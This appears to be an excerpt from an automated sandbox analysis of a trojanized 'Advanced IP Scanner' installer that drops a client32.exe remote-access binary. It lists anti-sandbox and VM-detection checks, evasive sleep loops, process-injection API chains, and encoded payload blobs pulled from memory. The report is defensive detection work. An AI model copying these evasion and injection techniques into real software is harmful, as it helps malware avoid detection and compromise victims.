Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-JMNJE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-FM5PR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-QK8GI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\platforms\qwindows.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-T33P0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-NAJMA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-VU48S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-UNM54.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-4DCVH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-087J4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)	Jump to dropped file

Found evaded block containing many API calls

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision	graph_7-78151
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision	graph_7-80961
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision	graph_7-81054
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision	graph_7-81242
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision	graph_7-81276
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Evaded block: after key decision

Found evasive API chain checking for process token information

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_7-78359

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	API coverage: 6.2 %
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	API coverage: 2.9 %

May check if the current machine is a sandbox (GetTickCount - Sleep)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_685A4F30

7_2_685A4F30

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6284	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe TID: 3140	Thread sleep time: -350000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe TID: 2160	Thread sleep time: -44200s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe TID: 3140	Thread sleep time: -1710250s >= -30000s	Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Last function: Thread delayed

Uses the system / local time for branch decision (may execute only at specific dates)

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe

Code function: 7_2_685A3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 685A3226h

7_2_685A3130

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	7_2_11123570
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	7_2_11069690
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,	7_2_1110BB80
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	7_2_11107FE0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	7_2_110BC3D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	7_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	7_2_11064E30
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	8_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	8_2_11123570
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	8_2_11069690
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,	8_2_1110BB80
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	8_2_11107FE0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	8_2_110BC3D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	8_2_11064E30

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: unins000.dat.1.dr	Binary or memory string: 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
Source: client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: VMware
Source: client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla]h*
Source: powershell.exe, 00000005.00000002.2177091666.000000000756D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: unins000.dat.1.dr	Binary or memory string: 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
Source: client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: client32.exe, 00000007.00000003.2067867442.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.2067853016.00000000030ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3639491690.00000000030EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWisement (ICMPv6-In)LMEM
Source: unins000.dat.1.dr	Binary or memory string: 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
Source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: client32.exe, 00000007.00000002.3639491690.00000000030EA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3638542031.000000000044E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: TCCTL32.DLL.5.dr	Binary or memory string: VMWare
Source: unins000.dat.1.dr	Binary or memory string: AYjgDCKVXTQPQHjASBQAWaCysPaouXOM/pZ0ZdDfofBYVFJ1CankUJIUbhxFCpMAf4OU7rMMwBx7P40K/kgYjI+igq6cD1NU0M2pIAzYzOlADg1U8HaKCr5x/ipUACQAYn+2LVHRuDCRRgmCQgk3XUnO1GlUwEng9JlL6bw2jV/gcdUY/GIBDKN7gUamDqOP2Zw+zmr7tf1IH/055+rLS/5e+qg6N6yBt/IqmnQlUCVk9+qIWYDQuSDzf7Te986OqFdB7KxsWssNG17RJFLPppBK1pu0tYTUWkLqH64i/vw/xu+nsavjF0QArzaF34z/0XqfiP0d+M38v8QvrvdhclVWKLTcRIYHrM7WB0tiqM/wusDmIATsCItEBvSReFawO0uazUdojNp6URP8KAuae7a+/Pa/d5yu+yyRaNTdzuug675Q5UJNU/7tf7vC8Cc6Xics4wIVf1e1xhHVNsFCUH87otUa12UfIiz3MWsMsCxaY4jimIJiWOjmMWu+2i2oAbkdacj9cvhsAYm+gJmaFKzC/LU/chrJgVNR5IwxjZAA7jRauv3vpaVbPh2N3JaFIFwXAH6JjnRNrNPQ0sFZP1UP1AwQ/AdBcA4hCAMEcgbHdmwI24DrnA8Aju4MjuRIt8ABytmPjekWciL2JBy//utobJsQ2wlrPPtYo3EUso+lkJ22XDr96nBKdpN96fykTiwgXt79RzpkwqxTNgDrdmkvwdcXUl8DPWlyH+cvXNirhEUFMPndeCaS9AelSFUJLUixM7TH1g7U4QSmE4SezKYj/UcLjEcuBjIpRwUIEvdyYTN32LRh1ff8NlXj/2h92i9VHzrO4BXifTer8Q3MLVoH6f6b4fVMFo8kMlhX8L+vC35ynRZm7GxtPJj4BlSaC5Xu7+8sUB8ZCGRStrm0DRls13zVOhg48FUrCtYBEqwDJFgHSLD+l2Hz4xfX35LJagsMLUvWqSXdOkPLKuDmKu0lbXxtQmn51YDQxhCGt64Gwy+uuh5yKDoGtQKHZ/dweKZGzuiYrjklDrGuSA/KQYaWEzgOjmk7U50yQemUKYYW4E+GdCFqdK4jF0fnS3VmJer5ypoFIlpMNDzzRCKNlQeIlQeIlQf0p7+dGCV/5AXjBYbQRLr9l4+bjoXMWsxsM2GMo03x4U7L7fImMsyTX72/SBWMC6vr6ndvRvuA/pk8yxg5fkFmHvMox+5NZEzQPZNZC+ogS3GNCpKbILnRPnSGLD/+V8xSgFnGiP3+2VSBzFYQjGesvpG5i5l1JvrEQQPQSDToqQY1c33nUvBCbDCug3Qj0qzWy4/1p4qUb0qDN54XqAO0MFwpmxA5M0Znl629aRmEMZNMPJuWZGwQ7r0wBMKkdBCMXwKEWZf+Jgifxf4mCEXxIRBU6SAIhtBalUIgwmrovJkcnJF1vDqQXgdSUuHVKWnCxaGesRVymhiLGPovpVGcLuAos+ZDye4iDsVYfT5zYKhka9HVISgaTKVLjm8c3nlej/zdP2WrGEqLwTadB7BeV4j29WkzAWv47m/xSrTR